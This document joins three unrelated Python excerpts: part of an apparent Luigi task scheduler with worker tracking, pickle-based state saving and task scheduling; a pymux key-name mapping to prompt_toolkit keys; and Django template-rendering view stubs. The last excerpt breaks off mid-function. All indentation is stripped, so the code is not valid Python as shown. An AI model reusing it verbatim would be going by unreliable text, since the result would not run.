def __init__(self, worker_id, last_active=None):
self.id = worker_id
self.reference = None # reference to the worker in the real world. (Currently a dict containing just the host)
self.last_active = last_active or time.time() # seconds since epoch
self.last_get_work = None
self.started = time.time() # seconds since epoch
self.tasks = set() # task objects
self.info = {}
def add_info(self, info):
self.info.update(info)
def update(self, worker_reference, get_work=False):
if worker_reference:
self.reference = worker_reference
self.last_active = time.time()
if get_work:
self.last_get_work = time.time()
def prune(self, config):
# Delete workers that haven't said anything for a while (probably killed)
if self.last_active + config.worker_disconnect_delay < time.time():
return True
def get_pending_tasks(self, state):
"""
Get PENDING (and RUNNING) tasks for this worker.
You have to pass in the state for optimization reasons.
"""
if len(self.tasks) < state.num_pending_tasks():
return six.moves.filter(lambda task: task.status in [PENDING, RUNNING],
self.tasks)
else:
return state.get_pending_tasks()
def is_trivial_worker(self, state):
"""
If it's not an assistant having only tasks that are without
requirements.
We have to pass the state parameter for optimization reasons.
"""
if self.assistant:
return False
return all(not task.resources for task in self.get_pending_tasks(state))
@property
def assistant(self):
return self.info.get('assistant', False)
def __str__(self):
return self.id
class SimpleTaskState(object):
"""
Keep track of the current state and handle persistance.
The point of this class is to enable other ways to keep state, eg. by using a database
These will be implemented by creating an abstract base class that this and other classes
inherit from.
"""
def __init__(self, state_path):
self._state_path = state_path
self._tasks = {} # map from id to a Task object
self._status_tasks = collections.defaultdict(dict)
self._active_workers = {} # map from id to a Worker object
def get_state(self):
return self._tasks, self._active_workers
def set_state(self, state):
self._tasks, self._active_workers = state
def dump(self):
try:
with open(self._state_path, 'wb') as fobj:
pickle.dump(self.get_state(), fobj)
except IOError:
logger.warning("Failed saving scheduler state", exc_info=1)
else:
logger.info("Saved state in %s", self._state_path)
# prone to lead to crashes when old state is unpickled with updated code. TODO some kind of version control?
def load(self):
if os.path.exists(self._state_path):
logger.info("Attempting to load state from %s", self._state_path)
try:
with open(self._state_path, 'rb') as fobj:
state = pickle.load(fobj)
except BaseException:
logger.exception("Error when loading state. Starting from clean slate.")
return
self.set_state(state)
self._status_tasks = collections.defaultdict(dict)
for task in six.itervalues(self._tasks):
self._status_tasks[task.status][task.id] = task
# Convert from old format
# TODO: this is really ugly, we need something more future-proof
# Every time we add an attribute to the Worker or Task class, this
# code needs to be updated
# Compatibility since 2014-06-02
for k, v in six.iteritems(self._active_workers):
if isinstance(v, float):
self._active_workers[k] = Worker(worker_id=k, last_active=v)
# Compatibility since 2015-05-28
if any(not hasattr(w, 'tasks') for k, w in six.iteritems(self._active_workers)):
# If you load from an old format where Workers don't contain tasks.
for k, worker in six.iteritems(self._active_workers):
worker.tasks = set()
for task in six.itervalues(self._tasks):
for worker_id in task.workers:
self._active_workers[worker_id].tasks.add(task)
# Compatibility since 2015-04-28
if any(not hasattr(t, 'disable_hard_timeout') for t in six.itervalues(self._tasks)):
for t in six.itervalues(self._tasks):
t.disable_hard_timeout = None
else:
logger.info("No prior state file exists at %s. Starting with clean slate", self._state_path)
def get_active_tasks(self, status=None):
if status:
for task in six.itervalues(self._status_tasks[status]):
yield task
else:
for task in six.itervalues(self._tasks):
yield task
def get_running_tasks(self):
return six.itervalues(self._status_tasks[RUNNING])
def get_pending_tasks(self):
return itertools.chain.from_iterable(six.itervalues(self._status_tasks[status])
for status in [PENDING, RUNNING])
def num_pending_tasks(self):
"""
Return how many tasks are PENDING + RUNNING. O(1).
"""
return len(self._status_tasks[PENDING]) + len(self._status_tasks[RUNNING])
def get_task(self, task_id, default=None, setdefault=None):
if setdefault:
task = self._tasks.setdefault(task_id, setdefault)
self._status_tasks[task.status][task.id] = task
return task
else:
return self._tasks.get(task_id, default)
def has_task(self, task_id):
return task_id in self._tasks
def re_enable(self, task, config=None):
task.scheduler_disable_time = None
task.failures.clear()
if config:
self.set_status(task, FAILED, config)
task.failures.clear()
def set_status(self, task, new_status, config=None):
if new_status == FAILED:
assert config is not None
if new_status == DISABLED and task.status == RUNNING:
return
if task.status == DISABLED:
if new_status == DONE:
self.re_enable(task)
# don't allow workers to override a scheduler disable
elif task.scheduler_disable_time is not None:
return
if new_status == FAILED and task.can_disable():
task.add_failure()
if task.has_excessive_failures():
task.scheduler_disable_time = time.time()
new_status = DISABLED
notifications.send_error_email(
'Luigi Scheduler: DISABLED {task} due to excessive failures'.format(task=task.id),
'{task} failed {failures} times in the last {window} seconds, so it is being '
'disabled for {persist} seconds'.format(
failures=config.disable_failures,
task=task.id,
window=config.disable_window,
persist=config.disable_persist,
))
elif new_status == DISABLED:
task.scheduler_disable_time = None
self._status_tasks[task.status].pop(task.id)
self._status_tasks[new_status][task.id] = task
task.status = new_status
def fail_dead_worker_task(self, task, config, assistants):
# If a running worker disconnects, tag all its jobs as FAILED and subject it to the same retry logic
if task.status == RUNNING and task.worker_running and task.worker_running not in task.stakeholders | assistants:
logger.info("Task %r is marked as running by disconnected worker %r -> marking as "
"FAILED with retry delay of %rs", task.id, task.worker_running,
config.retry_delay)
task.worker_running = None
self.set_status(task, FAILED, config)
task.retry = time.time() + config.retry_delay
def prune(self, task, config):
remove = False
# Mark tasks with no remaining active stakeholders for deletion
if not task.stakeholders:
if task.remove is None:
logger.info("Task %r has stakeholders %r but none remain connected -> will remove "
"task in %s seconds", task.id, task.stakeholders, config.remove_delay)
task.remove = time.time() + config.remove_delay
# Re-enable task after the disable time expires
if task.status == DISABLED and task.scheduler_disable_time:
if time.time() - fix_time(task.scheduler_disable_time) > config.disable_persist:
self.re_enable(task, config)
# Remove tasks that have no stakeholders
if task.remove and time.time() > task.remove:
logger.info("Removing task %r (no connected stakeholders)", task.id)
remove = True
# Reset FAILED tasks to PENDING if max timeout is reached, and retry delay is >= 0
if task.status == FAILED and config.retry_delay >= 0 and task.retry < time.time():
self.set_status(task, PENDING, config)
return remove
def inactivate_tasks(self, delete_tasks):
# The terminology is a bit confusing: we used to "delete" tasks when they became inactive,
# but with a pluggable state storage, you might very well want to keep some history of
# older tasks as well. That's why we call it "inactivate" (as in the verb)
for task in delete_tasks:
task_obj = self._tasks.pop(task)
self._status_tasks[task_obj.status].pop(task)
def get_active_workers(self, last_active_lt=None, last_get_work_gt=None):
for worker in six.itervalues(self._active_workers):
if last_active_lt is not None and worker.last_active >= last_active_lt:
continue
last_get_work = getattr(worker, 'last_get_work', None)
if last_get_work_gt is not None and (
last_get_work is None or last_get_work <= last_get_work_gt):
continue
yield worker
def get_assistants(self, last_active_lt=None):
return filter(lambda w: w.assistant, self.get_active_workers(last_active_lt))
def get_worker_ids(self):
return self._active_workers.keys() # only used for unit tests
def get_worker(self, worker_id):
return self._active_workers.setdefault(worker_id, Worker(worker_id))
def inactivate_workers(self, delete_workers):
# Mark workers as inactive
for worker in delete_workers:
self._active_workers.pop(worker)
# remove workers from tasks
for task in self.get_active_tasks():
task.stakeholders.difference_update(delete_workers)
task.workers.difference_update(delete_workers)
def get_necessary_tasks(self):
necessary_tasks = set()
for task in self.get_active_tasks():
if task.status not in (DONE, DISABLED) or \
getattr(task, 'scheduler_disable_time', None) is not None:
necessary_tasks.update(task.deps)
necessary_tasks.add(task.id)
return necessary_tasks
class CentralPlannerScheduler(Scheduler):
"""
Async scheduler that can handle multiple workers, etc.
Can be run locally or on a server (using RemoteScheduler + server.Server).
"""
def __init__(self, config=None, resources=None, task_history_impl=None, **kwargs):
"""
Keyword Arguments:
:param config: an object of class "scheduler" or None (in which the global instance will be used)
:param resources: a dict of str->int constraints
:param task_history_override: ignore config and use this object as the task history
"""
self._config = config or scheduler(**kwargs)
self._state = SimpleTaskState(self._config.state_path)
if task_history_impl:
self._task_history = task_history_impl
elif self._config.record_task_history:
from luigi import db_task_history # Needs sqlalchemy, thus imported here
self._task_history = db_task_history.DbTaskHistory()
else:
self._task_history = history.NopHistory()
self._resources = resources or configuration.get_config().getintdict('resources') # TODO: Can we make this a Parameter?
self._make_task = functools.partial(
Task, disable_failures=self._config.disable_failures,
disable_hard_timeout=self._config.disable_hard_timeout,
disable_window=self._config.disable_window)
self._worker_requests = {}
def load(self):
self._state.load()
def dump(self):
self._state.dump()
def prune(self):
logger.info("Starting pruning of task graph")
remove_workers = []
for worker in self._state.get_active_workers():
if worker.prune(self._config):
logger.info("Worker %s timed out (no contact for >=%ss)", worker, self._config.worker_disconnect_delay)
remove_workers.append(worker.id)
self._state.inactivate_workers(remove_workers)
assistant_ids = set(w.id for w in self._state.get_assistants())
remove_tasks = []
if assistant_ids:
necessary_tasks = self._state.get_necessary_tasks()
else:
necessary_tasks = ()
for task in self._state.get_active_tasks():
self._state.fail_dead_worker_task(task, self._config, assistant_ids)
if task.id not in necessary_tasks and self._state.prune(task, self._config):
remove_tasks.append(task.id)
self._state.inactivate_tasks(remove_tasks)
logger.info("Done pruning task graph")
def update(self, worker_id, worker_reference=None, get_work=False):
"""
Keep track of whenever the worker was last active.
"""
worker = self._state.get_worker(worker_id)
worker.update(worker_reference, get_work=get_work)
def _update_priority(self, task, prio, worker):
"""
Update priority of the given task.
Priority can only be increased.
If the task doesn't exist, a placeholder task is created to preserve priority when the task is later scheduled.
"""
task.priority = prio = max(prio, task.priority)
for dep in task.deps or []:
t = self._state.get_task(dep)
if t is not None and prio > t.priority:
self._update_priority(t, prio, worker)
def add_task(self, task_id=None, status=PENDING, runnable=True,
deps=None, new_deps=None, expl=None, resources=None,
priority=0, family='', module=None, params=None,
assistant=False, **kwargs):
"""
* add task identified by task_id if it doesn't exist
* if deps is not None, update dependency list
* update status of task
* add additional workers/stakeholders
* update priority when needed
"""
worker_id = kwargs['worker']
self.update(worker_id)
task = self._state.get_task(task_id, setdefault=self._make_task(
task_id=task_id, status=PENDING, deps=deps, resources=resources,
priority=priority, family=family, module=module, params=params))
# for setting priority, we'll sometimes create tasks with unset family and params
if not task.family:
task.family = family
if not getattr(task, 'module', None):
task.module = module
if not task.params:
task.params = _get_default(params, {})
if task.remove is not None:
task.remove = None # unmark task for removal so it isn't removed after being added
if expl is not None:
task.expl = expl
if not (task.status == RUNNING and status == PENDING) or new_deps:
# don't allow re-scheduling of task while it is running, it must either fail or succeed first
if status == PENDING or status != task.status:
# Update the DB only if there was a acctual change, to prevent noise.
# We also check for status == PENDING b/c that's the default value
# (so checking for status != task.status woule lie)
self._update_task_history(task, status)
self._state.set_status(task, PENDING if status == SUSPENDED else status, self._config)
if status == FAILED:
task.retry = self._retry_time(task, self._config)
if deps is not None:
task.deps = set(deps)
if new_deps is not None:
task.deps.update(new_deps)
if resources is not None:
task.resources = resources
if not assistant:
task.stakeholders.add(worker_id)
# Task dependencies might not exist yet. Let's create dummy tasks for them for now.
# Otherwise the task dependencies might end up being pruned if scheduling takes a long time
for dep in task.deps or []:
t = self._state.get_task(dep, setdefault=self._make_task(task_id=dep, status=UNKNOWN, deps=None, priority=priority))
t.stakeholders.add(worker_id)
self._update_priority(task, priority, worker_id)
if runnable:
task.workers.add(worker_id)
self._state.get_worker(worker_id).tasks.add(task)
task.runnable = runnable
def add_worker(self, worker, info, **kwargs):
self._state.get_worker(worker).add_info(info)
def update_resources(self, **resources):
if self._resources is None:
self._resources = {}
self._resources.update(resources)
def _has_resources(self, needed_resources, used_resources):
if needed_resources is None:
return True
available_resources = self._resources or {}
for resource, amount in six.iteritems(needed_resources):
if amount + used_resources[resource] > available_resources.get(resource, 1):
return False
return True
def _used_resources(self):
used_resources = collections.defaultdict(int)
if self._resources is not None:
for task in self._state.get_active_tasks():
if task.status == RUNNING and task.resources:
for resource, amount in six.iteritems(task.resources):
used_resources[resource] += amount
return used_resources
def _rank(self, task):
"""
Return worker's rank function for task scheduling.
:return:
"""
return task.priority, -task.time
def _schedulable(self, task):
if task.status != PENDING:
return False
for dep in task.deps:
dep_task = self._state.get_task(dep, default=None)
if dep_task is None or dep_task.status != DONE:
return False
return True
def _retry_time(self, task, config):
return time.time() + config.retry_delay
def get_work(self, host=None, assistant=False, **kwargs):
# TODO: remove any expired nodes
# Algo: iterate over all nodes, find the highest priority node no dependencies and available
# resources.
# Resource checking looks both at currently available resources and at which resources would
# be available if all running tasks died and we rescheduled all workers greedily. We do both
# checks in order to prevent a worker with many low-priority tasks from starving other
# workers with higher priority tasks that share the same resources.
# TODO: remove tasks that can't be done, figure out if the worker has absolutely
# nothing it can wait for
if self._config.prune_on_get_work:
self.prune()
worker_id = kwargs['worker']
# Return remaining tasks that have no FAILED descendants
self.update(worker_id, {'host': host}, get_work=True)
if assistant:
self.add_worker(worker_id, [('assistant', assistant)])
best_task = None
locally_pending_tasks = 0
running_tasks = []
upstream_table = {}
greedy_resources = collections.defaultdict(int)
n_unique_pending = 0
worker = self._state.get_worker(worker_id)
if worker.is_trivial_worker(self._state):
relevant_tasks = worker.get_pending_tasks(self._state)
used_resources = collections.defaultdict(int)
greedy_workers = dict() # If there's no resources, then they can grab any task
else:
relevant_tasks = self._state.get_pending_tasks()
used_resources = self._used_resources()
activity_limit = time.time() - self._config.worker_disconnect_delay
active_workers = self._state.get_active_workers(last_get_work_gt=activity_limit)
greedy_workers = dict((worker.id, worker.info.get('workers', 1))
for worker in active_workers)
tasks = list(relevant_tasks)
tasks.sort(key=self._rank, reverse=True)
for task in tasks:
upstream_status = self._upstream_status(task.id, upstream_table)
in_workers = (assistant and getattr(task, 'runnable', bool(task.workers))) or worker_id in task.workers
if task.status == RUNNING and in_workers:
# Return a list of currently running tasks to the client,
# makes it easier to troubleshoot
other_worker = self._state.get_worker(task.worker_running)
more_info = {'task_id': task.id, 'worker': str(other_worker)}
if other_worker is not None:
more_info.update(other_worker.info)
running_tasks.append(more_info)
if task.status == PENDING and in_workers and upstream_status != UPSTREAM_DISABLED:
locally_pending_tasks += 1
if len(task.workers) == 1 and not assistant:
n_unique_pending += 1
if best_task:
continue
if task.status == RUNNING and (task.worker_running in greedy_workers):
greedy_workers[task.worker_running] -= 1
for resource, amount in six.iteritems((task.resources or {})):
greedy_resources[resource] += amount
if self._schedulable(task) and self._has_resources(task.resources, greedy_resources):
if in_workers and self._has_resources(task.resources, used_resources):
best_task = task
else:
workers = itertools.chain(task.workers, [worker_id]) if assistant else task.workers
for task_worker in workers:
if greedy_workers.get(task_worker, 0) > 0:
# use up a worker
greedy_workers[task_worker] -= 1
# keep track of the resources used in greedy scheduling
for resource, amount in six.iteritems((task.resources or {})):
greedy_resources[resource] += amount
break
reply = {'n_pending_tasks': locally_pending_tasks,
'running_tasks': running_tasks,
'task_id': None,
'n_unique_pending': n_unique_pending}
if best_task:
self._state.set_status(best_task, RUNNING, self._config)
best_task.worker_running = worker_id
best_task.time_running = time.time()
self._update_task_history(best_task, RUNNING, host=host)
reply['task_id'] = best_task.id
reply['task_family'] = best_task.family
reply['task_module'] = getattr(best_task, 'module', None)
reply['task_params'] = best_task.params
return reply
def ping(self, **kwargs):
worker_id = kwargs['worker']
self.update(worker_id)
def _upstream_status(self, task_id, upstream_status_table):
if task_id in upstream_status_table:
return upstream_status_table[task_id]
elif self._state.has_task(task_id):
task_stack = [task_id]
while task_stack:
dep_id = task_stack.pop()
if self._state.has_task(dep_id):
dep = self._state.get_task(dep_id)
if dep.status == DONE:
continue
if dep_id not in upstream_status_table:
if dep.status == PENDING and dep.deps:
task_stack = task_stack + [dep_id] + list(dep.deps)
upstream_status_table[dep_id] = '' # will be updated postorder
else:
dep_status = STATUS_TO_UPSTREAM_MAP.get(dep.status, '')
upstream_status_table[dep_id] = dep_status
elif upstream_status_table[dep_id] == '' and dep.deps:
# This is the postorder update step when we set the
# status based on the previously calculated child elements
upstream_status = [upstream_status_table.get(a_task_id, '') for a_task_id in dep.deps]
upstream_status.append('') # to handle empty list
status = max(upstream_status, key=UPSTREAM_SEVERITY_KEY)
upstream_status_table[dep_id] = status
return upstream_status_table[dep_id]
def _serialize_task(self, task_id, include_deps=True):
task = self._state.get_task(task_id)
ret = {
'status': task.status,
'workers': list(task.workers),
'worker_running': task.worker_running,
'time_running': getattr(task, "time_running", None),
'start_time': task.time,
'params': task.params,
'name': task.family,
'priority': task.priority,
'resources': task.resources,
}
if task.status == DISABLED:
ret['re_enable_able'] = task.scheduler_disable_time is not None
if include_deps:
ret['deps'] = list(task.deps)
return ret
def graph(self, **kwargs):
self.prune()
serialized = {}
for task in self._state.get_active_tasks():
serialized[task.id] = self._serialize_task(task.id)
return serialized
def _recurse_deps(self, task_id, serialized):
if task_id not in serialized:
task = self._state.get_task(task_id)
if task is None or not task.family:
logger.warn('Missing task for id [%s]', task_id)
# try to infer family and params from task_id
try:
family, _, param_str = task_id.rstrip(')').partition('(')
params = dict(param.split('=') for param in param_str.split(', '))
except BaseException:
family, params = '', {}
serialized[task_id] = {
'deps': [],
'status': UNKNOWN,
'workers': [],
'start_time': UNKNOWN,
'params': params,
'name': family,
'priority': 0,
}
else:
serialized[task_id] = self._serialize_task(task_id)
for dep in task.deps:
self._recurse_deps(dep, serialized)
def dep_graph(self, task_id, **kwargs):
self.prune()
serialized = {}
if self._state.has_task(task_id):
self._recurse_deps(task_id, serialized)
return serialized
def task_list(self, status, upstream_status, limit=True, search=None, **kwargs):
"""
Query for a subset of tasks by status.
"""
self.prune()
result = {}
upstream_status_table = {} # used to memoize upstream status
if search is None:
filter_func = lambda _: True
else:
terms = search.split()
filter_func = lambda t: all(term in t.id for term in terms)
for task in filter(filter_func, self._state.get_active_tasks(status)):
if (task.status != PENDING or not upstream_status or
upstream_status == self._upstream_status(task.id, upstream_status_table)):
serialized = self._serialize_task(task.id, False)
result[task.id] = serialized
if limit and len(result) > self._config.max_shown_tasks:
return {'num_tasks': len(result)}
return result
def worker_list(self, include_running=True, **kwargs):
self.prune()
workers = [
dict(
name=worker.id,
last_active=worker.last_active,
started=getattr(worker, 'started', None),
**worker.info
) for worker in self._state.get_active_workers()]
workers.sort(key=lambda worker: worker['started'], reverse=True)
if include_running:
running = collections.defaultdict(dict)
num_pending = collections.defaultdict(int)
num_uniques = collections.defaultdict(int)
for task in self._state.get_pending_tasks():
if task.status == RUNNING and task.worker_running:
running[task.worker_running][task.id] = self._serialize_task(task.id, False)
elif task.status == PENDING:
for worker in task.workers:
num_pending[worker] += 1
if len(task.workers) == 1:
num_uniques[list(task.workers)[0]] += 1
for worker in workers:
tasks = running[worker['name']]
worker['num_running'] = len(tasks)
worker['num_pending'] = num_pending[worker['name']]
worker['num_uniques'] = num_uniques[worker['name']]
worker['running'] = tasks
return workers
def inverse_dep_graph(self, task_id, **kwargs):
self.prune()
serialized = {}
if self._state.has_task(task_id):
self._traverse_inverse_deps(task_id, serialized)
return serialized
def _traverse_inverse_deps(self, task_id, serialized):
stack = [task_id]
serialized[task_id] = self._serialize_task(task_id)
while len(stack) > 0:
curr_id = stack.pop()
for task in self._state.get_active_tasks():
if curr_id in task.deps:
serialized[curr_id]["deps"].append(task.id)
if task.id not in serialized:
serialized[task.id] = self._serialize_task(task.id)
serialized[task.id]["deps"] = []
stack.append(task.id)
def task_search(self, task_str, **kwargs):
"""
Query for a subset of tasks by task_id.
:param task_str:
:return:
"""
self.prune()
result = collections.defaultdict(dict)
for task in self._state.get_active_tasks():
if task.id.find(task_str) != -1:
serialized = self._serialize_task(task.id, False)
result[task.status][task.id] = serialized
return result
def re_enable_task(self, task_id):
serialized = {}
task = self._state.get_task(task_id)
if task and task.status == DISABLED and task.scheduler_disable_time:
self._state.re_enable(task, self._config)
serialized = self._serialize_task(task_id)
return serialized
def fetch_error(self, task_id, **kwargs):
if self._state.has_task(task_id):
return {"taskId": task_id, "error": self._state.get_task(task_id).expl}
else:
return {"taskId": task_id, "error": ""}
def _update_task_history(self, task, status, host=None):
try:
if status == DONE or status == FAILED:
successful = (status == DONE)
self._task_history.task_finished(task, successful)
elif status == PENDING:
self._task_history.task_scheduled(task)
elif status == RUNNING:
self._task_history.task_started(task, host)
except BaseException:
logger.warning("Error saving Task history", exc_info=True)
@property
def task_history(self):
# Used by server.py to expose the calls
return self._task_history
|
|
"""
Mapping between vt100 key sequences, the prompt_toolkit key constants and the
Pymux namings. (Those namings are kept compatible with tmux.)
"""
from __future__ import unicode_literals
from prompt_toolkit.keys import Keys
from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES
__all__ = (
'pymux_key_to_prompt_toolkit_key_sequence',
'prompt_toolkit_key_to_vt100_key',
'PYMUX_TO_PROMPT_TOOLKIT_KEYS',
)
def pymux_key_to_prompt_toolkit_key_sequence(key):
"""
Turn a pymux description of a key. E.g. "C-a" or "M-x" into a
prompt-toolkit key sequence.
Raises `ValueError` if the key is not known.
"""
# Make the c- and m- prefixes case insensitive.
if key.lower().startswith('m-c-'):
key = 'M-C-' + key[4:]
elif key.lower().startswith('c-'):
key = 'C-' + key[2:]
elif key.lower().startswith('m-'):
key = 'M-' + key[2:]
# Lookup key.
try:
return PYMUX_TO_PROMPT_TOOLKIT_KEYS[key]
except KeyError:
if len(key) == 1:
return (key, )
else:
raise ValueError('Unknown key: %r' % (key, ))
# Create a mapping from prompt_toolkit keys to their ANSI sequences.
# TODO: This is not completely correct yet. It doesn't take
# cursor/application mode into account. Create new tables for this.
_PROMPT_TOOLKIT_KEY_TO_VT100 = dict(
(key, vt100_data) for vt100_data, key in ANSI_SEQUENCES.items())
def prompt_toolkit_key_to_vt100_key(key, application_mode=False):
"""
Turn a prompt toolkit key. (E.g Keys.ControlB) into a Vt100 key sequence.
(E.g. \x1b[A.)
"""
application_mode_keys = {
Keys.Up: '\x1bOA',
Keys.Left: '\x1bOD',
Keys.Right: '\x1bOC',
Keys.Down: '\x1bOB',
}
if application_mode and key in application_mode_keys:
return application_mode_keys.get(key)
else:
return _PROMPT_TOOLKIT_KEY_TO_VT100.get(key, key)
PYMUX_TO_PROMPT_TOOLKIT_KEYS = {
'Space': (' '),
'C-a': (Keys.ControlA, ),
'C-b': (Keys.ControlB, ),
'C-c': (Keys.ControlC, ),
'C-d': (Keys.ControlD, ),
'C-e': (Keys.ControlE, ),
'C-f': (Keys.ControlF, ),
'C-g': (Keys.ControlG, ),
'C-h': (Keys.ControlH, ),
'C-i': (Keys.ControlI, ),
'C-j': (Keys.ControlJ, ),
'C-k': (Keys.ControlK, ),
'C-l': (Keys.ControlL, ),
'C-m': (Keys.ControlM, ),
'C-n': (Keys.ControlN, ),
'C-o': (Keys.ControlO, ),
'C-p': (Keys.ControlP, ),
'C-q': (Keys.ControlQ, ),
'C-r': (Keys.ControlR, ),
'C-s': (Keys.ControlS, ),
'C-t': (Keys.ControlT, ),
'C-u': (Keys.ControlU, ),
'C-v': (Keys.ControlV, ),
'C-w': (Keys.ControlW, ),
'C-x': (Keys.ControlX, ),
'C-y': (Keys.ControlY, ),
'C-z': (Keys.ControlZ, ),
'C-Left': (Keys.ControlLeft, ),
'C-Right': (Keys.ControlRight, ),
'C-Up': (Keys.ControlUp, ),
'C-Down': (Keys.ControlDown, ),
'C-\\': (Keys.ControlBackslash, ),
'S-Left': (Keys.ShiftLeft, ),
'S-Right': (Keys.ShiftRight, ),
'S-Up': (Keys.ShiftUp, ),
'S-Down': (Keys.ShiftDown, ),
'M-C-a': (Keys.Escape, Keys.ControlA, ),
'M-C-b': (Keys.Escape, Keys.ControlB, ),
'M-C-c': (Keys.Escape, Keys.ControlC, ),
'M-C-d': (Keys.Escape, Keys.ControlD, ),
'M-C-e': (Keys.Escape, Keys.ControlE, ),
'M-C-f': (Keys.Escape, Keys.ControlF, ),
'M-C-g': (Keys.Escape, Keys.ControlG, ),
'M-C-h': (Keys.Escape, Keys.ControlH, ),
'M-C-i': (Keys.Escape, Keys.ControlI, ),
'M-C-j': (Keys.Escape, Keys.ControlJ, ),
'M-C-k': (Keys.Escape, Keys.ControlK, ),
'M-C-l': (Keys.Escape, Keys.ControlL, ),
'M-C-m': (Keys.Escape, Keys.ControlM, ),
'M-C-n': (Keys.Escape, Keys.ControlN, ),
'M-C-o': (Keys.Escape, Keys.ControlO, ),
'M-C-p': (Keys.Escape, Keys.ControlP, ),
'M-C-q': (Keys.Escape, Keys.ControlQ, ),
'M-C-r': (Keys.Escape, Keys.ControlR, ),
'M-C-s': (Keys.Escape, Keys.ControlS, ),
'M-C-t': (Keys.Escape, Keys.ControlT, ),
'M-C-u': (Keys.Escape, Keys.ControlU, ),
'M-C-v': (Keys.Escape, Keys.ControlV, ),
'M-C-w': (Keys.Escape, Keys.ControlW, ),
'M-C-x': (Keys.Escape, Keys.ControlX, ),
'M-C-y': (Keys.Escape, Keys.ControlY, ),
'M-C-z': (Keys.Escape, Keys.ControlZ, ),
'M-C-Left': (Keys.Escape, Keys.ControlLeft, ),
'M-C-Right': (Keys.Escape, Keys.ControlRight, ),
'M-C-Up': (Keys.Escape, Keys.ControlUp, ),
'M-C-Down': (Keys.Escape, Keys.ControlDown, ),
'M-C-\\': (Keys.Escape, Keys.ControlBackslash, ),
'M-a': (Keys.Escape, 'a'),
'M-b': (Keys.Escape, 'b'),
'M-c': (Keys.Escape, 'c'),
'M-d': (Keys.Escape, 'd'),
'M-e': (Keys.Escape, 'e'),
'M-f': (Keys.Escape, 'f'),
'M-g': (Keys.Escape, 'g'),
'M-h': (Keys.Escape, 'h'),
'M-i': (Keys.Escape, 'i'),
'M-j': (Keys.Escape, 'j'),
'M-k': (Keys.Escape, 'k'),
'M-l': (Keys.Escape, 'l'),
'M-m': (Keys.Escape, 'm'),
'M-n': (Keys.Escape, 'n'),
'M-o': (Keys.Escape, 'o'),
'M-p': (Keys.Escape, 'p'),
'M-q': (Keys.Escape, 'q'),
'M-r': (Keys.Escape, 'r'),
'M-s': (Keys.Escape, 's'),
'M-t': (Keys.Escape, 't'),
'M-u': (Keys.Escape, 'u'),
'M-v': (Keys.Escape, 'v'),
'M-w': (Keys.Escape, 'w'),
'M-x': (Keys.Escape, 'x'),
'M-y': (Keys.Escape, 'y'),
'M-z': (Keys.Escape, 'z'),
'M-0': (Keys.Escape, '0'),
'M-1': (Keys.Escape, '1'),
'M-2': (Keys.Escape, '2'),
'M-3': (Keys.Escape, '3'),
'M-4': (Keys.Escape, '4'),
'M-5': (Keys.Escape, '5'),
'M-6': (Keys.Escape, '6'),
'M-7': (Keys.Escape, '7'),
'M-8': (Keys.Escape, '8'),
'M-9': (Keys.Escape, '9'),
'M-Up': (Keys.Escape, Keys.Up),
'M-Down': (Keys.Escape, Keys.Down, ),
'M-Left': (Keys.Escape, Keys.Left, ),
'M-Right': (Keys.Escape, Keys.Right, ),
'Left': (Keys.Left, ),
'Right': (Keys.Right, ),
'Up': (Keys.Up, ),
'Down': (Keys.Down, ),
'BSpace': (Keys.Backspace, ),
'BTab': (Keys.BackTab, ),
'DC': (Keys.Delete, ),
'IC': (Keys.Insert, ),
'End': (Keys.End, ),
'Enter': (Keys.ControlJ, ),
'Home': (Keys.Home, ),
'Escape': (Keys.Escape, ),
'Tab': (Keys.Tab, ),
'F1': (Keys.F1, ),
'F2': (Keys.F2, ),
'F3': (Keys.F3, ),
'F4': (Keys.F4, ),
'F5': (Keys.F5, ),
'F6': (Keys.F6, ),
'F7': (Keys.F7, ),
'F8': (Keys.F8, ),
'F9': (Keys.F9, ),
'F10': (Keys.F10, ),
'F11': (Keys.F11, ),
'F12': (Keys.F12, ),
'F13': (Keys.F13, ),
'F14': (Keys.F14, ),
'F15': (Keys.F15, ),
'F16': (Keys.F16, ),
'F17': (Keys.F17, ),
'F18': (Keys.F18, ),
'F19': (Keys.F19, ),
'F20': (Keys.F20, ),
'NPage': (Keys.PageDown, ),
'PageDown': (Keys.PageDown, ),
'PgDn': (Keys.PageDown, ),
'PPage': (Keys.PageUp, ),
'PageUp': (Keys.PageUp, ),
'PgUp': (Keys.PageUp, ),
}
|
|
from django.shortcuts import render
# Create your views here.
def proindex(request):
return render(request, 'example/probase.html' )
def index(request):
return render(request, 'e_index.html' )
def badges_labels(request):
return render(request, 'badges_labels.html' )
def four(request):
return render(request, '404.html' )
def five(request):
return render(request, '500.html' )
def basic_gallery(request):
return render(request, 'basic_gallery.html' )
def buttons(request):
return render(request, 'buttons.html' )
def calendar(request):
return render(request, 'calendar.html' )
def carousel(request):
return render(request, 'carousel.html' )
def chat_view(request):
return render(request, 'chat_view.html' )
def code_editor(request):
return render(request, 'code_editor.html' )
def contacts(request):
return render(request, 'contacts.html' )
def css_animation(request):
return render(request, 'css_animation.html' )
def draggable_panels(request):
return render(request, 'draggable_panels.html' )
def empty_page(request):
return render(request, 'empty_page.html' )
def faq(request):
return render(request, 'faq.html' )
def file_manager(request):
return render(request, 'file_manager.html' )
def form_advanced(request):
return render(request, 'form_advanced.html' )
def form_avatar(request):
return render(request, 'form_avatar.html' )
def form_basic(request):
return render(request, 'form_basic.html' )
def form_builder(request):
return render(request, 'form_builder.html' )
def form_editors(request):
return render(request, 'form_editors.html' )
def form_file_upload(request):
return render(request, 'form_file_upload.html' )
def form_markdown(request):
return render(request, 'form_markdown.html' )
def form_simditor(request):
return render(request, 'form_simditor.html' )
def form_validate(request):
return render(request, 'form_validate.html' )
def form_webuploader(request):
return render(request, 'form_webuploader.html' )
def form_wizard(request):
return render(request, 'form_wizard.html' )
def forum_main(request):
return render(request, 'forum_main.html' )
def graph_echarts(request):
return render(request, 'graph_echarts.html' )
def graph_flot(request):
return render(request, 'graph_flot.html' )
def graph_morris(request):
return render(request, 'graph_morris.html' )
def graph_peity(request):
return render(request, 'graph_peity.html' )
def graph_rickshaw(request):
return render(request, 'graph_rickshaw.html' )
def graph_sparkline(request):
return render(request, 'graph_sparkline.html' )
def grid_options(request):
return render(request, 'grid_options.html' )
def iconfont(request):
return render(request, 'iconfont.html' )
def icons(request):
return render(request, 'icons.html' )
def index_1(request):
return render(request, 'index_1.html' )
def index_2(request):
return render(request, 'index_2.html' )
def index_3(request):
return render(request, 'index_3.html' )
def index_4(request):
return render(request, 'index_4.html' )
def invoice(request):
